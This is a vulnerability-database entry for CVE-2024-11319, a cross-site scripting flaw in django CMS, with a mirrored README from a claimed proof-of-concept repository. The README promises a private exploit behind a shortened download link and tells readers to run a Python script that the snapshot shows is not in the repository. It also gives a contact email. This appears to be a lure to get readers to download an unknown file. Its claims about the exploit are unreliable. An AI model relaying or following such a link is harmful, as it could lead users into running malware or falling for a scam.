Related vulnerability
Title:
django CMS security vulnerability
(CVE-2024-11319)
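Description: django CMS is an open-source enterprise content management system built on the Django framework and released by the django CMS project. django CMS versions 3.11.7, 3.11.8, 4.1.2 and 4.1.3 contain a security vulnerability caused by improper neutralization of input during web page generation, which leaves them susceptible to cross-site scripting attacks.
Description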
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Introduction
# CVE-2024-11319: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
## Overview
An Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability has been identified in django CMS Association's django-cms.
## Exploit
**[Download Here](https://bit.ly/3APaYDU)**
## Details
+ **CVE ID:** CVE-2024-11319
+ **Published:** 18/11/2024
+ **Impact:** Critical
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.3
## Vulnerability Description
This vulnerability allows an attacker to execute malicious scripts in a user's browser within the context of the affected django-cms site.
## Affected Versions
This issue affects **django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.**
## Usage
```
python CVE-2024-11319.py
```
## Contact
For inquiries, please contact famixcm@thesecure.biz
File snapshot
[4.0K] /data/pocs/b19860576e05511387aec488c221aca8f09fd16c
└── [ 936] README.md
0 directories, 1 file
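Notes
1. We recommend accessing the content through the original source first.
2. If the source is no longer valid or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.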